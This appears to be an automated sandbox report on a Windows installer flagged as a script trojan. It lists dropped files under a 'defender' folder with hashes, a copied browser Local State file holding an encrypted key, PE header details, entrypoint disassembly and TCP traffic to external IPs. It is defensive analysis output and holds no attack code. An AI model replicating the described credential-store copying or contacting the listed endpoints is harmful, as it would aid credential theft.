                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.012340643231932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsGl3ll:/y
                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\DawnCache\index

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):262512
                                                                    Entropy (8bit):9.47693366977411E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:LsNleKl/:Ls3Vl
                                                                    MD5:17487978C1CE4BD199A7161C412E9624
                                                                    SHA1:7ADB51748A2DF4BE529A4C47F9FA5702FE5A3E4B
                                                                    SHA-256:0EF0F28048A27134668CAFBED14EAED429AEE13AD44D5741C987AA0BC0F6F713
                                                                    SHA-512:7B3D3FEB1C6FD8057B78559BFC443F3733D1CED59997781F190B955E8762FFA4CFADB9315E82EDF5A020B743F6132C42E5B2AC5318BD8F301C13B6A3867515F8
                                                                    Malicious:false
                                                                    Preview:..........................................9.s}/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\GPUCache\data_0

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.01057775872642915
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsFl:/F
                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                    Malicious:false
                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\GPUCache\data_1

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270336
                                                                    Entropy (8bit):8.280239615765425E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\GPUCache\data_2

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.011852361981932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsHlDll:/H
                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\GPUCache\data_3

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.012340643231932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsGl3ll:/y
                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\GPUCache\index

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):262512
                                                                    Entropy (8bit):9.553120663130604E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:LsNli2:Ls3
                                                                    MD5:FDB8030F9B7A44522A39A8D105CEDE96
                                                                    SHA1:3D0C2BDF14CDA5722721BD320198D71E64BD5DFD
                                                                    SHA-256:CBDAAAB3E64FEDF25EBA9D5D33E7D4411C5FAEE20A9438CB63847E3B1A73688C
                                                                    SHA-512:7D658F8641E1B7091790E7F10F96F8D107F166B355F2B2765238CABA0CBD9676D2160BA028388D09312B04C9E61878C81427504757664DAB63B679F600561AAD
                                                                    Malicious:false
                                                                    Preview:........................................a.8.s}/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\Local State (copy)

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):389
                                                                    Entropy (8bit):5.593166102929949
                                                                    Encrypted:false
                                                                    SSDEEP:6:YKWCRgXt9RdrtybHV+vk/CzU5A/y+OttzcyEvzgEcYkvkkowNjBJhXqpRi7WGb1:YKWSg99rrt+1A1NyjgJvzg+61hfaGb1
                                                                    MD5:21D9EE56704515FFCCAACEAE73364E3B
                                                                    SHA1:E63363B2C94C3B74CA70BB76071830548FC8D0F9
                                                                    SHA-256:4065D690CD539D2443CE89BEE2E9905A316733420DB215ECFF0CC77B27B255E6
                                                                    SHA-512:6141560E1D79024A693556F08C7A257500D44730FFBD7343A0DCC3D7ACA7F8EBF7FDB0A97E683A2CCD574716432DD2F128AD8D9D040DFDDAA0CB6E4158AD3379
                                                                    Malicious:false
                                                                    Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADb0wvCFkK9QZPr1SyT0UjDAAAAAAIAAAAAABBmAAAAAQAAIAAAADs/u+yww62kY9LDG5e0qdozxvxX8u1wHzcMWcgW6PaAAAAAAA6AAAAAAgAAIAAAACkCyCfxfMtoqTYb3jjAJyUlvyXN9N5PViIJ10isY2JsMAAAAEGE2Z3EFjU2YGf9Z76wyfDCUXZEPN/2/T/C0lkZaqHcddgcxbirR8bBj2gdinbNUUAAAAAuIe0ZvQy5iUh0jO3z9mwNTGuNybnxKLQrYwsZeseFrYvUVHzjzwbuYtWiopxZuKMwTuh0ETqq4tsYrsedyD0U"}}

                                                                    C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb\000001.dbtmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):16
                                                                    Entropy (8bit):3.2743974703476995
                                                                    Encrypted:false
                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                    Malicious:false
                                                                    Preview:MANIFEST-000001.

                                                                    C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb\CURRENT (copy)

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):16
                                                                    Entropy (8bit):3.2743974703476995
                                                                    Encrypted:false
                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                    Malicious:false
                                                                    Preview:MANIFEST-000001.

                                                                    C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb\LOG

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):255
                                                                    Entropy (8bit):5.2380283439361595
                                                                    Encrypted:false
                                                                    SSDEEP:6:PwwkXFQQ1cNwiaZ5p2jM8B2KLlJwwzvIq2PcNwiaZ5p2jMGIFUv:oHtNHOFLg8vIvLNHhFUv
                                                                    MD5:CBAEE12ACC58D26CE7E06266EC27DAA0
                                                                    SHA1:6899C1CF0E08ECBAFC6F01B4DAF58141658AB409
                                                                    SHA-256:C23CF0A90FD0153DBC26919C8F485948780AB9A6EE06AB170178B94DC3104826
                                                                    SHA-512:2B13B114F5EC968F56CC811FA4CFDC36A652BAACBD7917831525F4878D1F1AE24EB3E5849E1F5693293CC6E3BE5F427D472CA5984FCA1D9E359F7C1C92809900
                                                                    Malicious:false
                                                                    Preview:2024/08/04-11:35:16.722 5e0 Creating DB C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb since it was missing..2024/08/04-11:35:16.756 5e0 Reusing MANIFEST C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb/MANIFEST-000001.

                                                                    C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb\MANIFEST-000001

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:OpenPGP Secret Key
                                                                    Category:dropped
                                                                    Size (bytes):41
                                                                    Entropy (8bit):4.704993772857998
                                                                    Encrypted:false
                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                    Malicious:false
                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                    C:\Users\user\AppData\Roaming\defender\Network\779a48d6-73a4-4306-be9e-83dc823a97ba.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):59
                                                                    Entropy (8bit):4.619434150836742
                                                                    Encrypted:false
                                                                    SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                    MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                    SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                    SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                    SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                    Malicious:false
                                                                    Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                    C:\Users\user\AppData\Roaming\defender\Network\Network Persistent State (copy)

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):59
                                                                    Entropy (8bit):4.619434150836742
                                                                    Encrypted:false
                                                                    SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                    MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                    SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                    SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                    SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                    Malicious:false
                                                                    Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                    C:\Users\user\AppData\Roaming\defender\Preferences (copy)

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):57
                                                                    Entropy (8bit):4.283088322451805
                                                                    Encrypted:false
                                                                    SSDEEP:3:YWVbSZAjMx/ALfnH4JaGqx41n:YWNlDGn
                                                                    MD5:329622F40165883B656ABAB0D93674C4
                                                                    SHA1:DD0DDF3B58BA7BF841B7664F890C65DC7B20CE87
                                                                    SHA-256:2A2BF0F32B2E88B7394AB518C2EF85880824317076DCE7E932BB8C9B8F218488
                                                                    SHA-512:BF9173F47118D3FD466378CA186B74EFB7481AF15AEABD0BDBA43331721D93F5F9E4D1FD94F38873B8DBA9352D2EB4BF8044A21C52A52409615E3E25894393CF
                                                                    Malicious:false
                                                                    Preview:{"spellcheck":{"dictionaries":["en-GB"],"dictionary":""}}

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.999986009226097
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File size:69'484'987 bytes
                                                                    MD5:a4590450863f13aa67198ec0fe52453e
                                                                    SHA1:7bc926cf52aa4c390cb7d6ac5756a9b95f6e8fb2
                                                                    SHA256:d5628dd0e0710c14d9241a3eb0871dfa4fccf0888f6503d8b9a794cb5e8e6d71
                                                                    SHA512:d1311c150ebd9ad70998d3fd729e43ba9a86eac83f7e2686d0bcc5b95a9d0b7847d95c3c3ffae781048041d630ba9d7bc0d48ee66b37cfa483e7f65e179d4430
                                                                    SSDEEP:1572864:GrziNx5qUJsrnLn3ttl5lWSehqFfIxi+blIowRjnMUlS/tf/7:5x5qUJsrL3t5lWTjigwRjnBQ/9/7
                                                                    TLSH:FCE733D09FE8B517C3CC29FE58C4D7F23D9AD7A195B7D062A26524A3F68305D8A40C8B
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.

                                                                    File Icon

                                                                    Icon Hash:62ceac86b2868eb2

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40338f
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    sub esp, 000002D4h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    pop edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+14h], ebx
                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                    mov dword ptr [esp+1Ch], ebx
                                                                    call dword ptr [004080A8h]
                                                                    call dword ptr [004080A4h]
                                                                    and eax, BFFFFFFFh
                                                                    cmp ax, 00000006h
                                                                    mov dword ptr [0047AEECh], eax
                                                                    je 00007F71A8B52FF3h
                                                                    push ebx
                                                                    call 00007F71A8B562A5h
                                                                    cmp eax, ebx
                                                                    je 00007F71A8B52FE9h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 004082B0h
                                                                    push esi
                                                                    call 00007F71A8B5621Fh
                                                                    push esi
                                                                    call dword ptr [00408150h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], 00000000h
                                                                    jne 00007F71A8B52FCCh
                                                                    push 0000000Ah
                                                                    call 00007F71A8B56278h
                                                                    push 00000008h
                                                                    call 00007F71A8B56271h
                                                                    push 00000006h
                                                                    mov dword ptr [0047AEE4h], eax
                                                                    call 00007F71A8B56265h
                                                                    cmp eax, ebx
                                                                    je 00007F71A8B52FF1h
                                                                    push 0000001Eh
                                                                    call eax
                                                                    test eax, eax
                                                                    je 00007F71A8B52FE9h
                                                                    or byte ptr [0047AEEFh], 00000040h
                                                                    push ebp
                                                                    call dword ptr [00408044h]
                                                                    push ebx
                                                                    call dword ptr [004082A0h]
                                                                    mov dword ptr [0047AFB8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+34h]
                                                                    push 000002B4h
                                                                    push eax
                                                                    push ebx
                                                                    push 00440208h
                                                                    call dword ptr [00408188h]
                                                                    push 0040A2C8h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x10b0000x4568.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x66270x68007618d4c0cd8bb67ea9595b4266b3a91fFalse0.6646259014423077data6.450282348506287IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x14a20x1600eecac1fed9cc6b447d50940d178404d8False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x70ff80x600db8f31a08a2242d80c29e1f9500c6527False0.5182291666666666data4.037117731448378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x7b0000x900000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x10b0000x45680x46001b3165e64c8066127e58ce26cb8cd015False0.9090959821428571data7.707647483876318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x10b1d80x3b71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9826509824538345
                                                                    RT_DIALOG0x10ed500x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x10ee500xf8dataEnglishUnited States0.6330645161290323
                                                                    RT_DIALOG0x10ef480x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x10efa80x14dataEnglishUnited States1.05
                                                                    RT_VERSION0x10efc00x268MS Windows COFF Motorola 68000 object fileEnglishUnited States0.474025974025974
                                                                    RT_MANIFEST0x10f2280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 4, 2024 16:24:14.059120893 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.059159040 CEST44349712185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.059217930 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.059564114 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.059590101 CEST44349713185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.059663057 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.123156071 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.123177052 CEST44349712185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.123827934 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.123841047 CEST44349713185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.124576092 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:14.124641895 CEST4434971452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:14.124711990 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:14.161796093 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:14.161830902 CEST4434971452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:14.174165964 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.174189091 CEST44349715185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.174245119 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.175729990 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.175740957 CEST44349715185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.200362921 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.200381994 CEST44349716185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.200478077 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.200798035 CEST49717443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.200809002 CEST44349717185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.200858116 CEST49717443192.168.2.7185.111.234.27
